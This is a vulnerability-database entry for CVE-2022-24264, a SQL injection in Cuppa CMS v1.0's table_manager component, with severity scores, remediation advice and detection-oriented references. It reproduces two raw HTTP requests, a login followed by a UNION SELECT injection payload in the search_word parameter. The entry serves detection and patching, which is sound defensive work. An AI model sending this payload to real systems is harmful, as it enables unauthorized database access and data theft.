🔙 목록으로 돌아가기

CVE-2022-24264: Cuppa CMS v1.0 - SQL injection

TitleCuppa CMS v1.0 - SQL injection
Authortheamanrawat
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.
RemediationUpgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.
CVSS Score7.5
EPSS Score0.63624
CVE IDCVE-2022-24264
CWE IDCWE-89
Tags cve cve2022 sqli cuppa authenticated cuppacms vuln

🔍 Vulnerability Description

Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.

🌐 HTTP Request

POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

user=MBAZyl&password=XHR5Nx&language=en&task=login
POST /components/table_manager/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Content-Length: 183
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

search_word=')+union+all+select+1,md5('9123'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24264.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-24264.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A